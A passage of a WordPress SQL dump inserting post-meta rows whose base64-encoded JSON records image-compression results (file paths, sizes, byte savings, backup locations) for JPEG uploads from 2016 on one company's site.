VkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC14Zi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzY0MCwiaWQiOjEyODF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXhmLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC14Zi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwteGYtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM2NDMsImlkIjoxMjgxfV0='); 
INSERT INTO `wp_postmeta` VALUES (29627, 1280, 'wpfc_optimisation_reduction', '24634'); 
INSERT INTO `wp_postmeta` VALUES (29628, 1280, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLmpwZyIsIndpZHRoIjo1MzY0LCJoZWlnaHQiOjM1ODEsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NzM2NDgsImlkIjoiMTI4MCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo5MjAsInRpbWUiOjE0ODM1NzM2NTEsImlkIjoxMjgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctY29tcG9zaXRlcy04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctY29tcG9zaXRlcy04MDB4NTM0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjctY29tcG9zaXRlcy04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6Mjc1MCwidGltZSI6MTQ4MzU3MzY1NSwiaWQiOjEyODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTc2OHg1MTMuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTc2OHg1MTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTc2OHg1MTMuanBnIiwicmVkdWN0aW9uIjoyNjM4LCJ0aW1lIjoxNDgzNTczNjU4LCJpZCI6MTI4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTYwMHgxMDY4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTE2MDB4MTA2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6MTA5MDQsInRpbWUiOjE0ODM1NzM2NjIsImlkIjoxMjgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctY29tcG9zaXRlcy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctY29tcG9zaXRlcy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjctY29tcG9zaXRlcy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjY0LCJ0aW1lIjoxNDgzNTczNjY2LCJpZCI6MTI4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUyOCwidGltZSI6MTQ4MzU3MzY2OSwiaWQiOjEyODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02Ny1jb21wb3NpdGVzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MDUsInRpbWUiOjE0ODM1NzM2NzMsImlkIjoxMjgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctY29tcG9zaXRlcy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjctY29tcG9zaXRlcy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjctY29tcG9zaXRlcy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjA2MSwidGltZSI6MTQ4MzU3MzY3NiwiaWQiOjEyODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjQzMCwidGltZSI6MTQ4MzU3MzY4MCwiaWQiOjEyODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQzMiwidGltZSI6MTQ4MzU3MzY4MywiaWQiOjEyODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ4MSwidGltZSI6MTQ4MzU3MzY4NiwiaWQiOjEyODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjYyMSwidGltZSI6MTQ4MzU3MzY4OSwiaWQiOjEyODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjY0OCwidGltZSI6MTQ4MzU3MzY5MywiaWQiOjEyODB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY3LWNvbXBvc2l0ZXMtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjk1MiwidGltZSI6MTQ4MzU3MzY5NiwiaWQiOjEyODB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29629, 1279, 'wpfc_optimisation_reduction', '706614'); 
INSERT INTO `wp_postmeta` VALUES (29630, 1279, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjE1ODUsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4uanBnIiwicmVkdWN0aW9uIjo3MDY0MTcsInRpbWUiOjE0ODM1NzM3MDYsImlkIjoiMTI3OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNzA4LCJpZCI6MTI3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tODAweDQyMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQyMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tODAweDQyMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tODAweDQyMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM3MTEsImlkIjoxMjc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi03Njh4NDA2LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NDA2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi03Njh4NDA2LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi03Njh4NDA2LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzcxMywiaWQiOjEyNzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTE2MDB4ODQ1LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjg0NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tMTYwMHg4NDUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTE2MDB4ODQ1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzcxNywiaWQiOjEyNzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNzE5LCJpZCI6MTI3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9WQVpPLTY0LUFJQk4tMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM3MjEsImlkIjoxMjc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzcyNCwiaWQiOjEyNzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvVkFaTy02NC1BSUJOLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczNzI2LCJpZCI6MTI3OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6MTMyLCJ0aW1lIjoxNDgzNTczNzI4LCJpZCI6MTI3OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL1ZBWk8tNjQtQUlCTi0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfa